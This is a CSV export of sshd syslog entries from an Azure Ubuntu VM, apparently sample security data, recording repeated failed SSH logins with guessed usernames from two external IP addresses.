+12066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:58:18,UbuntuDevEnv,2019-06-26 01:58:18,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 44008:11: Bye Bye [preauth],93258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,44008,,
+12067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:58:18,UbuntuDevEnv,2019-06-26 01:58:18,auth,UbuntuDevEnv,info,Disconnected from invalid user wms 51.77.140.111 port 44008 [preauth],93258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wms,51.77.140.1,44008,,
+12068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:59:10,UbuntuDevEnv,2019-06-26 01:59:10,auth,UbuntuDevEnv,info,Invalid user deploy from 131.108.48.151 port 58626,93445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,131.108.48.1,58626,,
+12069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:59:10,UbuntuDevEnv,2019-06-26 01:59:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,93445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+12070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:59:10,UbuntuDevEnv,2019-06-26 01:59:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:59:12,UbuntuDevEnv,2019-06-26 01:59:12,auth,UbuntuDevEnv,info,Failed password for invalid user deploy from 131.108.48.151 port 58626 ssh2,93445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,131.108.48.1,58626,,
+12072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:59:13,UbuntuDevEnv,2019-06-26 01:59:12,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 58626:11: Bye Bye [preauth],93445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,58626,,
+12073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:59:13,UbuntuDevEnv,2019-06-26 01:59:12,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 131.108.48.151 port 58626 [preauth],93445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,131.108.48.1,58626,,
+12074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:59:41,UbuntuDevEnv,2019-06-26 01:59:41,auth,UbuntuDevEnv,info,Invalid user ftpusr from 51.77.140.111 port 60966,93559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpusr,51.77.140.1,60966,,
+12075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:59:41,UbuntuDevEnv,2019-06-26 01:59:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:59:41,UbuntuDevEnv,2019-06-26 01:59:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,93559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:59:43,UbuntuDevEnv,2019-06-26 01:59:43,auth,UbuntuDevEnv,info,Failed password for invalid user ftpusr from 51.77.140.111 port 60966 ssh2,93559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpusr,51.77.140.1,60966,,
+12078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:59:43,UbuntuDevEnv,2019-06-26 01:59:43,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 60966:11: Bye Bye [preauth],93559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,60966,,
+12079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:59:43,UbuntuDevEnv,2019-06-26 01:59:43,auth,UbuntuDevEnv,info,Disconnected from invalid user ftpusr 51.77.140.111 port 60966 [preauth],93559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpusr,51.77.140.1,60966,,
+12080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:01:06,UbuntuDevEnv,2019-06-26 02:01:06,auth,UbuntuDevEnv,info,Invalid user judith from 51.77.140.111 port 49692,93942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,judith,51.77.140.1,49692,,
+12081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:01:06,UbuntuDevEnv,2019-06-26 02:01:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,93942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:01:06,UbuntuDevEnv,2019-06-26 02:01:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:01:08,UbuntuDevEnv,2019-06-26 02:01:07,auth,UbuntuDevEnv,info,Failed password for invalid user judith from 51.77.140.111 port 49692 ssh2,93942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,judith,51.77.140.1,49692,,
+12084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:01:08,UbuntuDevEnv,2019-06-26 02:01:07,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 49692:11: Bye Bye [preauth],93942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,49692,,
+12085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:01:08,UbuntuDevEnv,2019-06-26 02:01:07,auth,UbuntuDevEnv,info,Disconnected from invalid user judith 51.77.140.111 port 49692 [preauth],93942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,judith,51.77.140.1,49692,,
+12086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:01:17,UbuntuDevEnv,2019-06-26 02:01:16,auth,UbuntuDevEnv,info,Invalid user amarco from 131.108.48.151 port 10718,93978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amarco,131.108.48.1,10718,,
+12087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:01:17,UbuntuDevEnv,2019-06-26 02:01:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:01:17,UbuntuDevEnv,2019-06-26 02:01:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,93978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+12089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:01:18,UbuntuDevEnv,2019-06-26 02:01:18,auth,UbuntuDevEnv,info,Failed password for invalid user amarco from 131.108.48.151 port 10718 ssh2,93978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amarco,131.108.48.1,10718,,
+12090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:01:19,UbuntuDevEnv,2019-06-26 02:01:18,auth,UbuntuDevEnv,info,Disconnected from invalid user amarco 131.108.48.151 port 10718 [preauth],93978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amarco,131.108.48.1,10718,,
+12091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:01:19,UbuntuDevEnv,2019-06-26 02:01:18,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 10718:11: Bye Bye [preauth],93978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,10718,,
+12092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:02:35,UbuntuDevEnv,2019-06-26 02:02:35,auth,UbuntuDevEnv,info,Invalid user le from 51.77.140.111 port 38418,94261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,le,51.77.140.1,38418,,
+12093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:02:35,UbuntuDevEnv,2019-06-26 02:02:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,94261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:02:35,UbuntuDevEnv,2019-06-26 02:02:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:02:37,UbuntuDevEnv,2019-06-26 02:02:37,auth,UbuntuDevEnv,info,Failed password for invalid user le from 51.77.140.111 port 38418 ssh2,94261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,le,51.77.140.1,38418,,
+12096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:02:37,UbuntuDevEnv,2019-06-26 02:02:37,auth,UbuntuDevEnv,info,Disconnected from invalid user le 51.77.140.111 port 38418 [preauth],94261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,le,51.77.140.1,38418,,
+12097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:02:37,UbuntuDevEnv,2019-06-26 02:02:37,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 38418:11: Bye Bye [preauth],94261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,38418,,
+12098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:03:28,UbuntuDevEnv,2019-06-26 02:03:27,auth,UbuntuDevEnv,info,Invalid user mwang2 from 131.108.48.151 port 19290,94439,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mwang2,131.108.48.1,19290,,
+12099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:03:28,UbuntuDevEnv,2019-06-26 02:03:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94439,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:03:28,UbuntuDevEnv,2019-06-26 02:03:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,94439,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+12101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:03:30,UbuntuDevEnv,2019-06-26 02:03:30,auth,UbuntuDevEnv,info,Failed password for invalid user mwang2 from 131.108.48.151 port 19290 ssh2,94439,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mwang2,131.108.48.1,19290,,
+12102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:03:30,UbuntuDevEnv,2019-06-26 02:03:30,auth,UbuntuDevEnv,info,Disconnected from invalid user mwang2 131.108.48.151 port 19290 [preauth],94439,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mwang2,131.108.48.1,19290,,
+12103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:03:30,UbuntuDevEnv,2019-06-26 02:03:30,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 19290:11: Bye Bye [preauth],94439,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,19290,,
+12104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:04:12,UbuntuDevEnv,2019-06-26 02:04:11,auth,UbuntuDevEnv,info,Invalid user ubuntu from 51.77.140.111 port 55382,94603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,51.77.140.1,55382,,
+12105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:04:12,UbuntuDevEnv,2019-06-26 02:04:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:04:12,UbuntuDevEnv,2019-06-26 02:04:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,94603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:04:14,UbuntuDevEnv,2019-06-26 02:04:13,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 51.77.140.111 port 55382 ssh2,94603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,51.77.140.1,55382,,
+12108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:04:14,UbuntuDevEnv,2019-06-26 02:04:13,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 55382:11: Bye Bye [preauth],94603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,55382,,
+12109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:04:14,UbuntuDevEnv,2019-06-26 02:04:13,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 51.77.140.111 port 55382 [preauth],94603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,51.77.140.1,55382,,
+12110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:05:25,UbuntuDevEnv,2019-06-26 02:05:25,auth,UbuntuDevEnv,info,Invalid user hy from 131.108.48.151 port 27844,94861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hy,131.108.48.1,27844,,
+12111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:05:25,UbuntuDevEnv,2019-06-26 02:05:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:05:25,UbuntuDevEnv,2019-06-26 02:05:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,94861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+12113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:05:28,UbuntuDevEnv,2019-06-26 02:05:27,auth,UbuntuDevEnv,info,Failed password for invalid user hy from 131.108.48.151 port 27844 ssh2,94861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hy,131.108.48.1,27844,,
+12114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:05:28,UbuntuDevEnv,2019-06-26 02:05:27,auth,UbuntuDevEnv,info,Disconnected from invalid user hy 131.108.48.151 port 27844 [preauth],94861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hy,131.108.48.1,27844,,
+12115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:05:28,UbuntuDevEnv,2019-06-26 02:05:27,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 27844:11: Bye Bye [preauth],94861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,27844,,
+12116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:05:41,UbuntuDevEnv,2019-06-26 02:05:41,auth,UbuntuDevEnv,info,Invalid user shoppizy from 51.77.140.111 port 44110,94921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shoppizy,51.77.140.1,44110,,
+12117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:05:41,UbuntuDevEnv,2019-06-26 02:05:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,94921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:05:41,UbuntuDevEnv,2019-06-26 02:05:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:05:43,UbuntuDevEnv,2019-06-26 02:05:43,auth,UbuntuDevEnv,info,Failed password for invalid user shoppizy from 51.77.140.111 port 44110 ssh2,94921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shoppizy,51.77.140.1,44110,,
+12120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:05:43,UbuntuDevEnv,2019-06-26 02:05:43,auth,UbuntuDevEnv,info,Disconnected from invalid user shoppizy 51.77.140.111 port 44110 [preauth],94921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shoppizy,51.77.140.1,44110,,
+12121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:05:43,UbuntuDevEnv,2019-06-26 02:05:43,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 44110:11: Bye Bye [preauth],94921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,44110,,
+12122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:07:07,UbuntuDevEnv,2019-06-26 02:07:06,auth,UbuntuDevEnv,info,Invalid user max from 51.77.140.111 port 32836,95218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,max,51.77.140.1,32836,,
+12123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:07:07,UbuntuDevEnv,2019-06-26 02:07:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,95218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:07:07,UbuntuDevEnv,2019-06-26 02:07:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:07:09,UbuntuDevEnv,2019-06-26 02:07:08,auth,UbuntuDevEnv,info,Failed password for invalid user max from 51.77.140.111 port 32836 ssh2,95218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,max,51.77.140.1,32836,,
